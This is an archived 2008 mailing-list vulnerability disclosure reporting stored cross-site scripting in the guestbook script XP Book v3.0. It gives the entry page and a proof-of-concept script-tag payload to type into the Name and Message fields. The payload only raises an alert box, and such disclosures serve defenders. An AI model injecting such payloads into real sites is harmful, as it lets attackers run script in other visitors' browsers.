OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
XSS in XP Book version 3.0

xx_hack_xx_2004hotmail.com
Date: Sun Mar 02 2008 - 15:59:08 CST


Hello ,

I haven't send any new bugs for long time :)

Vulnerable : XP Book v3.0
coded by http://kuwaitiphp.alruban.net
* i think their website doesn't work at the moment

exploit :
open http://www.example.com/xpbook/entry.php

then type in
Name:
'><script>alert(xss);</script>
Email :
whateverwhatever.com

Message :
'><script>alert(xss);</script>

then press Send ! and the code that we typed is going to work !

discovered by / Linux_Drox
www.LeZr.Com

Best regards ,